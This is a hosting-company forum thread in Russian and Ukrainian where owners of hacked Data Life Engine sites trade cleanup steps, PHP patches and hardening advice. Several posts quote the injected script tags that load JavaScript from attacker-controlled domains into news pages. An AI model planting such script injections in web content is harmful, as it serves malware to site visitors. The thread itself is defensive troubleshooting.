Акция!  Домен 34 грн, домен 55 грн, домен  - 200 грн домен  - 65 грн, домен  - 99 грн, домен  - 56 грн!, домен  - 425 грн!
Мы используем cookie-файлы
Для оптимизации работы нашего сайта мы используем cookie-файлы. Продолжая использовать сайт, Вы соглашаетесь с использованием cookie-файлов.
  • RUB
  • USD
  • EUR
  • UAH
Чат техподдержки
Вы являетесь клиентом?
  • +38(044) 392-74-33  Киев
  • +38(057) 728-39-00  Харьков
  • +38(056) 794-38-31  Днепр
  • +38(032) 229-58-93  Львов
  • +38(048) 738-57-70  Одесса
  • +38(093) 170-15-42  Life
  • +38(067) 400-88-44  Киевстар
  • +38(095) 630-90-82  MTC
  • +1(888)393-24-51  USA, Toll free
  • +44(131)507-01-14  Great Britain
  • +7(499) 348-28-61  Москва

Хостинг. Взломали сайт

Форумы Хостинг Взломали сайт
wolfes666
8 лет
хостинг: нет
домен: нет
Взломали сайт
Ребята помогите кто разбирается, у меня сайт на Data Life Engine сделан и все время кто-то в новостях прописывает в начале и в конце вот такой код, тех поддержка у нас не работает, восстановить mysql тоже (нету в списке новой базы).

Вот тот скрипт что он приписывает:

<script src="http://zheenix.msk.ru/a043bb882dd6b02d4a8a0074123bfeaa.js" type="text/javascript"></script><script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script>

он еще издевается! ...

Вот форум по этой теме (http://talk.prowebber.ru/index.php?showtopic=3990&pid=34123&st=0), я искал вредоносный код по которому он прописывает в новостях эту фигню, но ничего не нашел.

Кто разбирается помогите.
wolfes666
8 лет
хостинг: нет
домен: нет
может попробовать методы описаны тут http://bestwebber.ru/hacks/72-zashhita-dle-sajta-ot-vzloma.html открыть доступ к админ панелям только моему ip, или это не поможет?
alien131
8 лет
хостинг: нет
домен: есть
Обнови Data Life Engine...може профіксили баг.
або поміняй CMS.
wolfes666
8 лет
хостинг: нет
домен: нет
да это и хочу сделать

да) вроде все удачно прошло ) надеюсь в новой бэкдоров нету.
lineage_2008
8 лет
хостинг: нет
домен: нет
тоже самое у меня щас - (выгребаю 2 день - новостей слишком много). а код сидит тут /www/engine/cache/rss.tmp (удалите rss.tmp и код перестанет появляться в новостях Но прийдется это все <script src="http://zheenix.msk.ru/a043bb882dd6b02d4a8a0074123bfeaa.js" type="text/javascript"></script><script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script> удалять вручную с каждой новости ) файл rss.tmp сам востановится.
sosiska
8 лет
хостинг: есть
домен: есть
Вначале можно обезвредить вредоносный код с помощью функции Поиск и замена, которая есть в админпанели движка DLE. Просто меняем http://zheenix.msk.ru на пробел. Теперь скрипт не работает. Оставшиеся хвостики типа "/a043bb882dd6b02d4a8a0074123bfeaa.js" особого вреда, наверное, не представляют.
Но, чтобы больше эта проблема не возникала нужно подлатать дыры в движке. Инструкции ниже:



Для исправления откройте файл engine/inc/files.php и найдите:
$serverfile = trim( htmlspecialchars( strip_tags( $_POST['serverfile'] ) ) );


замените на:
if ($member_id['user_group'] == 1) $serverfile = trim( htmlspecialchars( strip_tags( $_POST['serverfile'] ) ) ); else $serverfile = '';

if ( $serverfile != '' ) {

$serverfile = str_replace( "\\", "/", $serverfile );
$serverfile = str_replace( "..", "", $serverfile );
$serverfile = str_replace( "/", "", $serverfile );
$serverfile_arr = explode( ".", $serverfile );
$type = totranslit( end( $serverfile_arr ) );
$curr_key = key( $serverfile_arr );
unset( $serverfile_arr[$curr_key] );

if ( in_array( strtolower( $type ), $allowed_files ) )
$serverfile = totranslit( implode( ".", $serverfile_arr ) ) . "." . $type;
else $serverfile = '';

}

if( $serverfile == ".htaccess") die("Hacking attempt!");


Откройте файл engine/classes/thumb.class.php и найдите:
$this->img['des'] = imagecreatetruecolor( $this->img['lebar_thumb'], $this->img['tinggi_thumb'] );


и добавьте выше:
if ($this->img['lebar_thumb'] < 1 ) $this->img['lebar_thumb'] = 1;
if ($this->img['tinggi_thumb'] < 1 ) $this->img['tinggi_thumb'] = 1;




Откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите:
$count_result = 0;

ниже добавьте:
$sql_count = "";

Откройте файл engine/inc/templates.php и найдите:
$allow_save = false;

ниже добавьте:
$_REQUEST['do_template'] = trim( totranslit($_REQUEST['do_template'], false, false) );
$_REQUEST['do_language'] = trim( totranslit($_REQUEST['do_language'], false, false) );
sosiska
8 лет
хостинг: есть
домен: есть
Забыл написать, что с остальными адресами вредителя нужно поступить также, как с zheenix.msk.ru. То есть http://you-stupped-lox.ucoz.ru тоже заменяем на пробел.
lineage_2008
8 лет
хостинг: нет
домен: нет
Вначале можно обезвредить вредоносный код с помощью функции Поиск и замена, которая есть в админпанели движка DLE. Просто меняем <a href="http://zheenix.msk.ru" target="_blank" rel="nofollow">http://zheenix.msk.ru</a> на пробел. Теперь скрипт не работает.


А не проще эти файлы удалить, а не ставить пробелы ( как у меня получилось код обезвредить - читайте выше )

Но, чтобы больше эта проблема не возникала нужно подлатать дыры в движке. Инструкции ниже:


Для какой версии ДЛЕ эти инструкции ???
sosiska
8 лет
хостинг: есть
домен: есть
Удалить файлы не получится, так как они находятся НЕ на вашем сервере, а подгружается со стороны :) А так данная операция заняла 1,5 минуты.
Удаление файла rss.tmp не решит проблему уже "инфицированных" публикаций. Чистить руками целесообразно, если база новостей небольшая. А если 20 000 новостей, как у меня, то умом тронешься..
Инструкции в принципе для всех версий DLE. Просто в более новых, например в девятой, эти дыры уже закрыты. В некоторых одни закрыты, другие нет. Тут смотрите сами. А совсем старых вообще нужно выполнить каждый из этих шагов. Данные меры обезопасят сайт в будущем от подобных неприятностей.
Также можно предпринять дополнительные меры предосторожности: http://seo-doc.ru/defence/defence-dle/44-zashhita-dle-ot-vzloma.html
lineage_2008
8 лет
хостинг: нет
домен: нет
Удалить файлы не получится, так как они находятся НЕ на вашем сервере, а подгружается со стороны :)

Наверное Вы меня не поняли
Они были связаны с rss.tmp ( т.е удаляеш это <script src="http://zheenix.msk.ru/5237bfba6fad3b68ac7cb25aa38ed330.js" type="text/javascript"></script><script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script> на этом месте вылазит это <script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script><script src="http://www.karbrrbrr.co.cc/16d70455cdee14e9500a819485db36af.js" type="text/javascript"></script> и так до 10 разных адресов ( на большее мне терпения не хватило экспереминтировать ) а вот когда вычислил что файл rss.tmp является источником ( взял его и удалил по FTP с сервера ) то все эти адреса перестали появлятся. НО теперь приходиться вручную чистить новости. Кстати у меня версия 9.0 и тоже заплатки на дыры ставил - как видно непомогло.

Удаление файла rss.tmp не решит проблему уже "инфицированных" публикаций.

Те что успели новости заразится ( а заражаются они сразу все ) после удаления rss.tmp - БОЛЬШЕ НОВЫЕ АДРЕСА НЕ ПОЯВЛЯЮТСЯ в новостях

Чистить руками целесообразно, если база новостей небольшая. А если 20 000 новостей, как у меня, то умом тронешься..

Я еще не тронулся =). Если дорожите своими посетителями - то прийдется чистить новости руками ( я уже лишился 2-3К людей за время которое этот скрипт работал - на данный момент больше половины базы новостей почистил и люди стали опять появлятся )

На этом разрешите откланятся - а то тема становится бесполезным спором (флудом).

Я описал свой способ обезвреживания - который у меня нормально сработал.
wolfes666
8 лет
хостинг: нет
домен: нет
я просто новую версию накатал ) и восстановил mysql ) новости еще не все почистил )
wolfes666
8 лет
хостинг: нет
домен: нет
снова взломали сайт <script src="http://goooogle.ipq.co/a2b07526ddd1fda7b48ead676c5a11b4.js" type="text/javascript"></script>
wolfes666
8 лет
хостинг: нет
домен: нет
только пару дней назад новый сайт установил...
wolfes666
8 лет
хостинг: нет
домен: нет
Володя

а где этот зараженный файл?
lineage_2008
8 лет
хостинг: нет
домен: нет
снова взломали сайт <script src="<a href="http://goooogle.ipq.co/a2b07526ddd1fda7b48ead676c5a11b4.js"" target="_blank" rel="nofollow">http://goooogle.ipq.co/a2b07526ddd1fda7b48ead676c5a11b4.js"</a> type="text/javascript"></script>

Тоже самое (только почистил) - поставил 8.3 (была 9.0) посмотрим что утром будет (появятся новые адреса или нет)

вот нашел инфу об этом http://talk.prowebber.ru/index.php?showtopic=3990
Arturjan
8 лет
хостинг: нет
домен: есть
Удали на..й это DLE!!!
alien131
8 лет
хостинг: нет
домен: есть
Видали всі файли... постав з нуля CMS і не став старий шаблон!

P.S.: в мене ніколи просто такого не було
Arturjan
8 лет
хостинг: нет
домен: есть
Слушай если я сейчас начну качать твои конфиги посмотрим что с этого получится.Просто в Joomla качаются пустыми.И ты сам написал что тебя ломали много раз - так зачем это тебе нужно?
Arturjan
8 лет
хостинг: нет
домен: есть
Права поставь на конфиги другие.Все будет работать,я одному пацеку так вопще права не менял и у него все работало.
birdsong
8 лет
хостинг: есть
домен: нет
Когда все почистите, не забудьте сменить все пароли FTP. А также проверьте версию своего антивируса. Возможно скрипт прописывают с Вашего же компа.
Удачи.
lineage_2008
8 лет
хостинг: нет
домен: нет
Вот что еще нашел по этой теме - http://dle.net.ua/bagfixs/5817-ocherednaya-dyrka-na-dle.html
Участвовать в общении на этом форуме могут только
зарегистрированные пользователи.

Если вы уже зарегистрированы Вам необходимо войти на форум.

Тема закрыта по истечению срока давности.